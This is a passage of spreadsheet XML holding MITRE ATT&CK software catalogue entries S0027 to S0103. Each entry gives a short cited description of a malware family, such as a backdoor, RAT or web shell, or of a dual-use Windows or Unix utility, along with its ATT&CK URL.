    <t>[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0027</t>
  </si>
  <si>
    <t>S0028</t>
  </si>
  <si>
    <t>SHIPSHAPE</t>
  </si>
  <si>
    <t>[SHIPSHAPE](https://attack.mitre.org/software/S0028)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</si>
  <si>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https://attack.mitre.org/software/S0028</t>
  </si>
  <si>
    <t>S0029</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0029</t>
  </si>
  <si>
    <t>S0030</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://attack.mitre.org/groups/G0008)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak) (Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0030</t>
  </si>
  <si>
    <t>S0031</t>
  </si>
  <si>
    <t>BACKSPACE</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0031</t>
  </si>
  <si>
    <t>S0032</t>
  </si>
  <si>
    <t>gh0st RAT</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0032</t>
  </si>
  <si>
    <t>S0033</t>
  </si>
  <si>
    <t>NetTraveler</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0033</t>
  </si>
  <si>
    <t>S0034</t>
  </si>
  <si>
    <t>NETEAGLE</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) is a backdoor developed by [APT30](https://attack.mitre.org/groups/G0013) with compile dates as early as 2008. It has two main variants known as "Scout" and "Norton." (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0034</t>
  </si>
  <si>
    <t>S0035</t>
  </si>
  <si>
    <t>SPACESHIP</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035)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</si>
  <si>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https://attack.mitre.org/software/S0035</t>
  </si>
  <si>
    <t>S0036</t>
  </si>
  <si>
    <t>FLASHFLOOD</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036)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</si>
  <si>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https://attack.mitre.org/software/S0036</t>
  </si>
  <si>
    <t>S0037</t>
  </si>
  <si>
    <t>HAMMERTOSS</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: FireEye APT29) (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0037</t>
  </si>
  <si>
    <t>S0038</t>
  </si>
  <si>
    <t>Duqu</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0038</t>
  </si>
  <si>
    <t>S0039</t>
  </si>
  <si>
    <t>Net</t>
  </si>
  <si>
    <t>The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)
[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) using &lt;code&gt;net use&lt;/code&gt; commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as &lt;code&gt;net1 user&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0039</t>
  </si>
  <si>
    <t>S0040</t>
  </si>
  <si>
    <t>HTRAN</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0040</t>
  </si>
  <si>
    <t>S0041</t>
  </si>
  <si>
    <t>Wiper</t>
  </si>
  <si>
    <t>[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0041</t>
  </si>
  <si>
    <t>S0042</t>
  </si>
  <si>
    <t>LOWBALL</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0042</t>
  </si>
  <si>
    <t>S0043</t>
  </si>
  <si>
    <t>BUBBLEWRAP</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0043</t>
  </si>
  <si>
    <t>S0044</t>
  </si>
  <si>
    <t>JHUHUGIT</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) is malware used by [APT28](https://attack.mitre.org/groups/G0007). It is based on Carberp source code and serves as reconnaissance malware. (Citation: Kaspersky Sofacy) (Citation: F-Secure Sofacy 2015) (Citation: ESET Sednit Part 1) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0044</t>
  </si>
  <si>
    <t>S0045</t>
  </si>
  <si>
    <t>ADVSTORESHELL</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0045</t>
  </si>
  <si>
    <t>S0046</t>
  </si>
  <si>
    <t>CozyCar</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0046</t>
  </si>
  <si>
    <t>S0047</t>
  </si>
  <si>
    <t>Hacking Team UEFI Rootkit</t>
  </si>
  <si>
    <t>[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0047</t>
  </si>
  <si>
    <t>S0048</t>
  </si>
  <si>
    <t>PinchDuke</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0048</t>
  </si>
  <si>
    <t>S0049</t>
  </si>
  <si>
    <t>GeminiDuke</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0049</t>
  </si>
  <si>
    <t>S0050</t>
  </si>
  <si>
    <t>CosmicDuke</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0050</t>
  </si>
  <si>
    <t>S0051</t>
  </si>
  <si>
    <t>MiniDuke</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0051</t>
  </si>
  <si>
    <t>S0052</t>
  </si>
  <si>
    <t>OnionDuke</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0052</t>
  </si>
  <si>
    <t>S0053</t>
  </si>
  <si>
    <t>SeaDuke</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0053</t>
  </si>
  <si>
    <t>S0054</t>
  </si>
  <si>
    <t>CloudDuke</t>
  </si>
  <si>
    <t>[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0054</t>
  </si>
  <si>
    <t>S0055</t>
  </si>
  <si>
    <t>RARSTONE</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0055</t>
  </si>
  <si>
    <t>S0056</t>
  </si>
  <si>
    <t>Net Crawler</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0056</t>
  </si>
  <si>
    <t>S0057</t>
  </si>
  <si>
    <t>Tasklist</t>
  </si>
  <si>
    <t>The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0057</t>
  </si>
  <si>
    <t>S0058</t>
  </si>
  <si>
    <t>SslMM</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0058</t>
  </si>
  <si>
    <t>S0059</t>
  </si>
  <si>
    <t>WinMM</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0059</t>
  </si>
  <si>
    <t>S0060</t>
  </si>
  <si>
    <t>Sys10</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0060</t>
  </si>
  <si>
    <t>S0061</t>
  </si>
  <si>
    <t>HDoor</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0061</t>
  </si>
  <si>
    <t>S0062</t>
  </si>
  <si>
    <t>DustySky</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0062</t>
  </si>
  <si>
    <t>S0063</t>
  </si>
  <si>
    <t>SHOTPUT</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0063</t>
  </si>
  <si>
    <t>S0064</t>
  </si>
  <si>
    <t>ELMER</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0064</t>
  </si>
  <si>
    <t>S0065</t>
  </si>
  <si>
    <t>4H RAT</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0065</t>
  </si>
  <si>
    <t>S0066</t>
  </si>
  <si>
    <t>3PARA RAT</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0066</t>
  </si>
  <si>
    <t>S0067</t>
  </si>
  <si>
    <t>pngdowner</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-
execute" utility. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0067</t>
  </si>
  <si>
    <t>S0068</t>
  </si>
  <si>
    <t>httpclient</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0068</t>
  </si>
  <si>
    <t>S0069</t>
  </si>
  <si>
    <t>BLACKCOFFEE</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) is malware that has been used by several Chinese groups since at least 2013. (Citation: FireEye APT17) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0069</t>
  </si>
  <si>
    <t>S0070</t>
  </si>
  <si>
    <t>HTTPBrowser</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0070</t>
  </si>
  <si>
    <t>S0071</t>
  </si>
  <si>
    <t>hcdLoader</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0071</t>
  </si>
  <si>
    <t>S0072</t>
  </si>
  <si>
    <t>OwaAuth</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0072</t>
  </si>
  <si>
    <t>S0073</t>
  </si>
  <si>
    <t>ASPXSpy</t>
  </si>
  <si>
    <t>[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0073</t>
  </si>
  <si>
    <t>S0074</t>
  </si>
  <si>
    <t>Sakula</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. (Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0074</t>
  </si>
  <si>
    <t>S0075</t>
  </si>
  <si>
    <t>Reg</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)
Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0075</t>
  </si>
  <si>
    <t>S0076</t>
  </si>
  <si>
    <t>FakeM</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0076</t>
  </si>
  <si>
    <t>S0077</t>
  </si>
  <si>
    <t>CallMe</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0077</t>
  </si>
  <si>
    <t>S0078</t>
  </si>
  <si>
    <t>Psylo</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM](https://attack.mitre.org/software/S0076). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0078</t>
  </si>
  <si>
    <t>S0079</t>
  </si>
  <si>
    <t>MobileOrder</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0079</t>
  </si>
  <si>
    <t>S0080</t>
  </si>
  <si>
    <t>Mivast</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0080</t>
  </si>
  <si>
    <t>S0081</t>
  </si>
  <si>
    <t>Elise</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of
tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0081</t>
  </si>
  <si>
    <t>S0082</t>
  </si>
  <si>
    <t>Emissary</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0082</t>
  </si>
  <si>
    <t>S0083</t>
  </si>
  <si>
    <t>Misdat</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0083</t>
  </si>
  <si>
    <t>S0084</t>
  </si>
  <si>
    <t>Mis-Type</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0084</t>
  </si>
  <si>
    <t>S0085</t>
  </si>
  <si>
    <t>S-Type</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0085</t>
  </si>
  <si>
    <t>S0086</t>
  </si>
  <si>
    <t>ZLib</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0086</t>
  </si>
  <si>
    <t>S0087</t>
  </si>
  <si>
    <t>Hi-Zor</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://attack.mitre.org/software/S0074). It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0087</t>
  </si>
  <si>
    <t>S0088</t>
  </si>
  <si>
    <t>Kasidet</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0088</t>
  </si>
  <si>
    <t>S0089</t>
  </si>
  <si>
    <t>BlackEnergy</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0089</t>
  </si>
  <si>
    <t>S0090</t>
  </si>
  <si>
    <t>Rover</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0090</t>
  </si>
  <si>
    <t>S0091</t>
  </si>
  <si>
    <t>Epic</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0091</t>
  </si>
  <si>
    <t>S0092</t>
  </si>
  <si>
    <t>Agent.btz</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0092</t>
  </si>
  <si>
    <t>S0093</t>
  </si>
  <si>
    <t>Backdoor.Oldrea</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0093</t>
  </si>
  <si>
    <t>S0094</t>
  </si>
  <si>
    <t>Trojan.Karagany</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a backdoor primarily used for recon. The source code for it was leaked in 2010 and it is sold on underground forums. (Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0094</t>
  </si>
  <si>
    <t>S0095</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>[FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0095</t>
  </si>
  <si>
    <t>S0096</t>
  </si>
  <si>
    <t>Systeminfo</t>
  </si>
  <si>
    <t>[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0096</t>
  </si>
  <si>
    <t>S0097</t>
  </si>
  <si>
    <t>Ping</t>
  </si>
  <si>
    <t>[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0097</t>
  </si>
  <si>
    <t>S0098</t>
  </si>
  <si>
    <t>T9000</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0098</t>
  </si>
  <si>
    <t>S0099</t>
  </si>
  <si>
    <t>Arp</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) displays information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0099</t>
  </si>
  <si>
    <t>S0100</t>
  </si>
  <si>
    <t>ipconfig</t>
  </si>
  <si>
    <t>[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0100</t>
  </si>
  <si>
    <t>S0101</t>
  </si>
  <si>
    <t>ifconfig</t>
  </si>
  <si>
    <t>[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0101</t>
  </si>
  <si>
    <t>S0102</t>
  </si>
  <si>
    <t>nbtstat</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0102</t>
  </si>
  <si>
    <t>S0103</t>
  </si>
  <si>
    <t>route</t>
  </si>
  <si>
    <t>[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0103</t>
  </si>
  <si>
